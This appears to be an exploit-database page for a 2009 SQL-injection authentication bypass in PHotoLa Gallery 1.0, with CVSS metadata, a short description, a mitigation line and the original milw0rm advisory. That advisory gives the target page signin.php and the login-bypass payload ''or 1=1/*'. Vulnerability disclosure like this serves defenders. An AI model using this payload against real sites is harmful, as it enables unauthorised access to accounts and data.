header-logo
Suggest Exploit
vendor:
PHotoLa Gallery
by:
Red-D3v1L
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHotoLa Gallery
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:photola:photola_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHotoLa Gallery <= 1.0 (Auth Bypass) SQL injection Valunrability

A vulnerability exists in PHotoLa Gallery version 1.0 which allows an attacker to bypass authentication and gain access to the application. This is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by supplying a specially crafted 'or 1=1/*' payload in the 'username' parameter of the 'signin.php' page.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                        

==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  PHotoLa Gallery <= 1.0 (Auth Bypass) SQL injection Valunrability
==============================================================================
    [»] my home:            [ Hackteach.org ]
    [»] Script:             [ PHotoLa Gallery ]
    [»] Language:           [ PHP ]
    [»] home:               [ http://www.photola.co.uk ]
    [»] Founder:            [ Red-D3v1L < php-c0de@hotmail.com > ]
    [»] Gr44tz to:          [ All member Hackteach.org/cc ]

###########################################################################



===[ Exploit SQL  ]===  
  
    [»] [PaTH]/signin.php


    [»] Exploit : 'or 1=1/*

 

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-07]

Navigation

Suggest Exploit

Services By CQR